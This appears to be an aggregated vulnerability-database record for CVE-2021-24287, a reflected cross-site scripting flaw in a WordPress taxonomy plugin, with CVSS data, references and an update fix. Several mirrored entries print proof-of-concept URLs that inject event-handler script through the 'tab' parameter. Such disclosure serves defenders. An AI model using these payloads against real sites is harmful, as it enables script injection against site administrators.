Description
The settings page of the Select All Categories and Taxonomies, Change Checkbox to Radio Buttons WordPress plugin before 1.3.2 did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
Affected Software
Related
{"id": "CVE-2021-24287", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24287", "description": "The settings page of the Select All Categories and Taxonomies, Change Checkbox to Radio Buttons WordPress plugin before 1.3.2 did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue", "published": "2021-05-14T12:15:00", "modified": "2021-10-18T11:51:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24287", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf", "http://packetstormsecurity.com/files/164327/WordPress-Select-All-Categories-And-Taxonomies-1.3.1-Cross-Site-Scripting.html"], "cvelist": ["CVE-2021-24287"], "immutableFields": [], "lastseen": "2022-03-23T14:51:02", "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50349"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164327"]}, {"type": "wpexploit", "idList": ["WPEX-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF"]}, {"type": "zdt", "idList": ["1337DAY-ID-36825"]}], "rev": 4}, "score": {"value": 2.7, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-05-21T07:53:33", "tweets": [{"link": "https://twitter.com/www_sesin_at/status/1395870897442066434", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24287 (select_all_categories_and_taxonomies,_change_checkbox_to_radio_buttons)) has been published on https://t.co/FrY870k6Et?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1395870883609206791", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24287 (select_all_categories_and_taxonomies,_change_checkbox_to_radio_buttons)) has been published on https://t.co/yhAVuJ0GYE?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1395846968501542917", "text": " NEW: CVE-2021-24287 The settings page of the Select All Categories and Taxonomies, Change Checkbox to Radio Buttons WordPress plugin before 1.3.2 did not properly sanitise the tab parameter before outputting it... (click for more) Severity: MEDIUM https://t.co/om50yCuIRN?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1395846968501542917", "text": " NEW: CVE-2021-24287 The settings page of the Select All Categories and Taxonomies, Change Checkbox to Radio Buttons WordPress plugin before 1.3.2 did not properly sanitise the tab parameter before outputting it... (click for more) Severity: MEDIUM https://t.co/om50yCuIRN?amp=1"}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50349"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164327"]}, {"type": "wpexploit", "idList": ["WPEX-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF"]}, {"type": "zdt", "idList": ["1337DAY-ID-36825"]}]}, "exploitation": null, "vulnersScore": 2.7}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "mooveagency:select_all_categories_and_taxonomies\\,_change_checkbox_to_radio_buttons", "version": "1.3.2", "operator": "lt", "name": "mooveagency select all categories and taxonomies\\, change checkbox to radio buttons"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\\,_change_checkbox_to_radio_buttons:1.3.2:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.3.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf", "name": "https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164327/WordPress-Select-All-Categories-And-Taxonomies-1.3.1-Cross-Site-Scripting.html", "name": "http://packetstormsecurity.com/files/164327/WordPress-Select-All-Categories-And-Taxonomies-1.3.1-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"packetstorm": [{"lastseen": "2021-09-29T15:03:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-09-29T00:00:00", "type": "packetstorm", "title": "WordPress Select All Categories And Taxonomies 1.3.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24287"], "modified": "2021-09-29T00:00:00", "id": "PACKETSTORM:164327", "href": "https://packetstormsecurity.com/files/164327/WordPress-Select-All-Categories-And-Taxonomies-1.3.1-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) \n# Date: 2/15/2021 \n# Author: 0xB9 \n# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip \n# Version: 1.3.1 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24287 \n \n1. Description: \nThe tab parameter in the Admin Panel is vulnerable to XSS. \n \n2. Proof of Concept: \nwp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(/XSS/); \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164327/wpsact131-xss.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-05-28T19:33:09", "bulletinFamily": "software", "cvelist": ["CVE-2021-24287"], "description": "The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue\n\n### PoC\n\nhttps://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=\" onMouseOver=\"alert(1); https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab;=\"+style%3D\"animation-name%3Aspinner\"+onanimationstart%3D\"alert(%2FXSS%2F)\n", "modified": "2021-04-24T07:01:14", "id": "WPVDB-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF", "href": "https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf", "published": "2021-04-23T00:00:00", "type": "wpvulndb", "title": "Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-12-22T15:26:58", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-09-29T00:00:00", "type": "zdt", "title": "WordPress Select All Categories and Taxonomies 1.3.1 Plugin - Reflected Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24287"], "modified": "2021-09-29T00:00:00", "id": "1337DAY-ID-36825", "href": "https://0day.today/exploit/description/36825", "sourceData": "# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)\n# Author: 0xB9\n# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip\n# Version: 1.3.1\n# Tested on: Windows 10\n# CVE: CVE-2021-24287\n\n1. Description:\nThe tab parameter in the Admin Panel is vulnerable to XSS.\n\n2. Proof of Concept:\nwp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(/XSS/);\n", "sourceHref": "https://0day.today/exploit/36825", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:27", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by 0xB9 in WordPress Select All Categories and Taxonomies, Change Checkbox to Radio Buttons plugin (versions <= 1.3.1).\n\n## Solution\n\n\r\n Update the WordPress Select All Categories and Taxonomies, Change Checkbox to Radio Buttons plugin to the latest available version (at least 1.3.2).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-23T00:00:00", "type": "patchstack", "title": "WordPress Select All Categories and Taxonomies, Change Checkbox to Radio Buttons plugin <= 1.3.1 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24287"], "modified": "2021-04-23T00:00:00", "id": "PATCHSTACK:06BF4A273A4DF2BFA7F46994CC76DAD3", "href": "https://patchstack.com/database/vulnerability/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/wordpress-select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons-plugin-1-3-1-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-05-28T19:33:09", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24287"], "description": "The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue\n", "modified": "2021-04-24T07:01:14", "published": "2021-04-23T00:00:00", "id": "WPEX-ID:56E1BB56-BFC5-40DD-B2D0-EDEF43D89BDF", "href": "", "type": "wpexploit", "title": "Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS)", "sourceData": "https://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\" onMouseOver=\"alert(1);\r\n\r\nhttps://example.com/wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style%3D\"animation-name%3Aspinner\"+onanimationstart%3D\"alert(%2FXSS%2F)", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-05-13T17:35:18", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-29T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24287", "CVE-2021-24287"], "modified": "2021-09-29T00:00:00", "id": "EDB-ID:50349", "href": "https://www.exploit-db.com/exploits/50349", "sourceData": "# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)\r\n# Date: 2/15/2021\r\n# Author: 0xB9\r\n# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip\r\n# Version: 1.3.1\r\n# Tested on: Windows 10\r\n# CVE: CVE-2021-24287\r\n\r\n1. Description:\r\nThe tab parameter in the Admin Panel is vulnerable to XSS.\r\n\r\n2. Proof of Concept:\r\nwp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(/XSS/);", "sourceHref": "https://www.exploit-db.com/download/50349", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
CVE-2021-24287
